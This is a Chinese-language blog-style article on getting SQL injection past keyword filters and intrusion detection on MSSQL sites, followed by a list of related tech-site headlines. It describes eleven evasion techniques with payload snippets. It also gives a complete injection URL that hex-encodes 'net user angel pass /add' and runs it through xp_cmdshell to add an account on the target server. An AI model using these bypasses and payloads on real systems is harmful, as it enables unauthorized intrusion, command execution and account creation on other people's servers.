关键字如何绕过?怎么过滤关键字?
一般通用过滤字符串的关键字有以下这些:
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
对于关键字的过滤,以下是我收集的以及我个人的一些想法。
1、运用编码技术绕过
如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
2、通过空格绕过
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or' swords' =‘swords' ,由于mssql的松散性,我们可以把or 'swords' 之间的空格去掉,并不影响运行。
3、运用字符串判断代替
用经典的or 1=1判断绕过,如or 'swords' ='swords',这个方法就是网上在讨论的。
4、通过类型转换修饰符N绕过
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or 'swords' = N' swords' ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
5、通过+号拆解字符串绕过
效果值得考证,但毕竟是一种方法。如 or 'swords' =‘sw' +' ords' ;EXEC(‘IN' +' SERT INTO '+' …..' )
6、通过LIKE绕过
以前怎么就没想到呢?如or 'swords' LIKE 'sw'!!!显然可以很轻松的绕过“=”“>”的限制……
7、通过IN绕过
与上面的LIKE的思路差不多,如or 'swords' IN ('swords')
8、通过BETWEEN绕过
如or 'swords' BETWEEN 'rw' AND 'tw'
9、通过>或者<绕过
or 'swords' >'sw'
or 'swords' < 'tw'
or 1<3
……
10、运用注释语句绕过
用代替空格,如:UNION Select user,pwd,from tbluser
用分割敏感词,如:U NION SE LECT user,pwd from tbluser
11、用HEX绕过,一般的IDS都无法检测出来
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)
另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a
效果:
http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% 20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--
其中的 0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 就是“net user angel pass /add”的意思。
这个是突破单个如NoSqlHack这类文件的。但我认为最重要的是要考虑服务器的安全,配置安全,有健全的防火墙和杀毒软件。就这样吧。也很久没更新BOLG了。
大部分被黑网站根源在于该网站有隐藏的后门脚本
你的网站为什么被黑了?经过网络安全公司Sucuri的安全专家的调查,有大约68%的被黑网站存在着隐藏的后门backdoor脚本。这些后门脚本就是为入侵者提供的秘密通道,即使管理员改变安全口令或更新了安全补丁,只要没
详情2018-01-19 14:07:30责编:llp 来源:驱动管家serv-u ftp越狱 如何防范serv-u ftp越狱?
防范serv-u ftp越狱的代码如下:[*]----------------------------------------------------[*]Serv-U FTP Server Jail Break 0dayDiscovered By KingcopeYear 2011[*]----------------------------------
详情2018-01-24 14:19:56责编:llp 来源:驱动管家利用windows自带功能给文件夹加密的方法是什么?
每个人都有一些不希望别人看到的东西,例如学习计划、情书等等,大家都喜欢把它们放在一个文件夹里,虽然可以采用某些工具软件给文件夹加密,但那样太麻烦了,有没有什么简单的方法可以为自己的文件夹设定一个密
详情2018-01-07 14:44:43责编:llp 来源:驱动管家d盾拦截国内注入工具,却无法识别国外注入工具提交的参数
少壮不努力,长大遇啊D----某大黑客D盾有多不爽我就不说了,现在都是批量注入,时不时的弹出D盾提示,甚是恼人。。。。。其实这个并不是我发现的,而是国外的一个注入工具。某日本人心血来潮,想换一个linux系统
详情2018-02-04 09:58:46责编:llp 来源:驱动管家打开电脑的六种方法 原来打电话也能开计算机
如果有人问:“你会开计算机吗?”你肯定会说:“不就是按一下 Power 键吗?这有谁不会?开机,不只从这里开始如果再问你:“除了按 Power 键开机外,你还会用其他的方法开机吗?”你肯定会一愣。开机六种玩
详情2018-01-12 08:50:40责编:llp 来源:驱动管家什么是防火墙?防火墙有哪些类别?
随着INTERNET的迅猛发展,现在每家每户都拥有计算机并且都连接上了INTERNET,在网络给我们带来了方便的同时,互联网的弊端也慢慢显露出来,不少人在联网时会被人有意或者无意的攻击,从而导致自己存储在计算机上
详情2018-01-07 10:25:54责编:llp 来源:驱动管家discuz论坛模板功能区存在注射漏洞
Discuz论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在广大用户中有良好的口碑。由于
详情2018-01-21 13:37:25责编:llp 来源:驱动管家怎么用文件夹嗅探器来测试自己的文件夹加密软件?
对文件和文件夹进行加密保护是很多用户保护数据的一种方法。遗憾的是,很多人并没有选择EFS方式加密,而是借助了第三方工具进行保护。这里面存在一个重大的安全隐患,因为很多加密工具都是利用系统BUG进行数据保
详情2018-02-08 16:33:50责编:llp 来源:驱动管家oracle数据库学习 谈谈入侵oracle数据库的体会
一、先看下面的一个贴子:Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库
详情2018-01-11 16:24:29责编:llp 来源:驱动管家域名系统的作用 域名系统dns的工作原理
1 1 域名系统(Domain Name System)DNS即Domain Name System 的缩写,域名系统以分布式数据库的形式将域名和IP地址相互映射。DNS协议即域名解析协议,简单的说:DNS是用来解析域名的。有了DNS我们就不用再记
详情2018-02-10 20:52:44责编:llp 来源:驱动管家
- SketchUp草图大师后边线怎么隐藏
- 教你用excel制作出一个简单的考勤表
- 微信电脑版怎么样 微信Windows版功能与下载地址
- asp是什么文件 asp文件怎么打开
- 澳国防部因担心中国“间谍活动” 禁止员工使用微信
- 美国科学家们计划对即将到来的小行星进行核攻击
- 智能家居和手机的联动在中国谁来做?华为是最合适的
- Linux使用git bash出现乱码的解决方法
- 诺基亚lumia 1320多少钱?诺基亚lumia 1320配置如何?
- 诺基亚新款 双卡双待诺基亚105多少钱?
- 怎么显示和隐藏电脑中的文件夹?看看这个教程
- TCP、IP、HTTP、SOCKET的介绍以及它们之间的区别和联系
- 微软捆绑web浏览器:Internet Explorer存在欺骗漏洞
- 改网站链接字母为验证码可进入织梦网站后台?这漏洞怎么解决?
- 驱动人生新增温度检测,快给你的电脑降降温
- C4D怎么制作规律的跳动的小圆球动画 c4d教程
- fdf是什么文件 fdf文件怎么打开
- hex是什么文件 hex文件怎么打开
- 特斯拉向马斯克给予26亿美元的股权奖励 遭拒绝
- 小米6稳定版相机优化已经在内部测试 争取3月份发布